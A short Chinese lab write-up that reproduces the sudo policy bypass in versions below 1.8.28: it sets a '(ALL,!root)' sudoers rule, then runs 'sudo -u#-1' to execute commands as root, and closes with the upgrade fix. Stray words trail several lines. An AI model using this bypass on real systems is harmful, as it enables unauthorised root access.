Sudo是linux的系统命令,让普通帐号以root方式执行命令linux
正常来讲若是普通用户须要用sudo,须要修改配置文件/etc/sudoers,将sudo使用权赋予该用户vim
而这个漏洞使得普通用户也能够绕过安全策略,执行敏感命令安全
漏洞影响的版本是<1.8.28spa
实验环境:kali3d
漏洞复现过程blog
一、 查看sudo版本class
Sudo –Vtest
二、 修改配置文件:vim/etc/sudoers 在root(ALL:ALL)ALL添加一行配置
Test ALL=(ALL,!root)ALL权限
第一个ALL表示用户能够在任意地方使用sudo
第二个(ALL,!root)表示命令能够被除了root之外的任意用户执行
最后一个ALL表示容许被执行
总体代码:test用户能够使用sudo,是除了root之外的任意用户去执行
注意:须要建立test用户:useradd test passwd test
三、 切换到test用户
Su test
而后sudo id(查看root的ID)
发现没有权限执行
四、 使用如下方法去执行想要的执行的命令
Sudo –u#数字 命令
其中数字范围:-1~4294967295,命令是系统命令
数字-1或者最大表明root用户
修复方法:更新sudo版本>=1.8.28
该漏洞比较鸡肋,须要管理员修改配置文件